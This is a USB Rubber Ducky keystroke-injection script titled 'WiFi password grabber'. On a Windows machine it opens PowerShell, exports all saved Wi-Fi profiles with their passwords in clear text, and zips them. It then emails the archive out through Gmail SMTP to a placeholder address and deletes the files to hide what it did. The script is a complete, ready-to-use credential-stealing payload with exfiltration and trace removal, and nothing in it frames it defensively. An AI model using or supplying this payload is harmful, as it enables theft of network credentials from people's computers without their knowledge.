REM Title: WiFi password grabber
REM Author: Quacked
REM Version: 4
REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account.
DELAY 4000
REM --> Minimize all windows
GUI r
DELAY 500
REM --> Open cmd
DELAY 1000
STRING powershell
ENTER
DELAY 1000

REM ---GET NETWORK PassWord to a Zip File
STRING netsh wlan export profile key=clear
ENTER
DELAY 1000  

REM ---Creo carpeta y comprimo
STRING mkdir catilano  
ENTER        
DELAY 500 
STRING mv .\Wi-* .\catilano
ENTER
DELAY 1000     

REM ---- Abro powerShell y comprimo     
STRING Add-Type -A System.IO.Compression.FileSystem
ENTER
STRING [IO.Compression.ZipFile]::CreateFromDirectory('.\catilano','.\catilano.zip');
ENTER
DELAY 1000

REM --> Mail 
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('sender_email@gmail.com', 'sender_email_password')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'sender_email@gmail.com'
ENTER
STRING $ReportEmail.To.Add('receiver_email@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi key Passwords'
ENTER
STRING $ReportEmail.Body = 'Hola Mundo'
ENTER
STRING $ReportEmail.Attachments.Add('.\catilano.zip')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 8000

REM ----Borro los rastros
STRING del -r .\catilano
ENTER
STRING del -r .\catilano.zip
ENTER

REM --> and exit PowerShell
STRING exit
DELAY 500
REM --> and exit CMD
STRING exit
ENTER


